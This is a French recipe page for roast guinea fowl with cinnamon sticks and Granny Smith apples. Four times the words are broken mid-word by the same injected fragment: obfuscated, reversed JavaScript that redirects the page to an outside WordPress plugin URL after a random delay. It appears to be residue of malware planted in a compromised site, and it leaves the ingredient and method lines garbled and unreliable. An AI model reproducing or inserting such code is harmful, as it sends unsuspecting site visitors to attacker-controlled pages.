PINTADE CANNELLE ET POMMES GRANNY

PINTADE CANNELLE ET POMMES GRANNY

Quoi de mieux qu’un mélange sucré-salé qui mettra un peu de douceur dans vos assiettes en fêtes pour cette fin d’année ?! Laissez-vous tenter par cette recette originale et pleine de surprises…

Pour 4 Pers.

INGRÉDIENTS :


– 1 belle pintade d’environ 1,5kg
– 5 pommes Granny Smith
– 1 orange bio
– ½ citron bio
– 50g de beurre
– 5 batoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons de canelle
– 1 CS d’huile d’olive • sel / poivre

Préchauffer le four à 190°, sortir la pintade du frigo 10 minutes avant de la cuire, la saler et la poivrer (intérieur et exterieur).


Peler puis couper les pommes en quartier et retirer le coeur. Les citronner pour éviter qu’elles ne brunissent.


Farcir” la pintade avec 2 quartiers de pomme, le zeste de l’orange, 1 bâtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton de cannelle et 25g de beurre coupé en dés


Huiler une cocotte en fonte et y deposer dans le fond 4 bâtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons de cannelle. Poser la pintade dessus et disposer autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour les quartiers de pommes. Mettre le reste de beurre en petits morceaux par dessus. Couvrir et cuire 40 minutes au four.


Retirer le couvercle, reserver les pommes. Poursuivre la cuisson de la pintade 20 minutes au four à 210° dans la cocotte sans couvercle. Remettre les pommes dans la cocotte 5 minutes avant la fin de la cuisson.


Servir la pintade accompagnée du jus de cuisson (enlever un maximum la graisse et rajouter un filet de jus d’orange).

Leave comments

Your email is safe with us.

Ce site est protégé par reCAPTCHA et le GooglePolitique de confidentialité etConditions d'utilisation appliquer.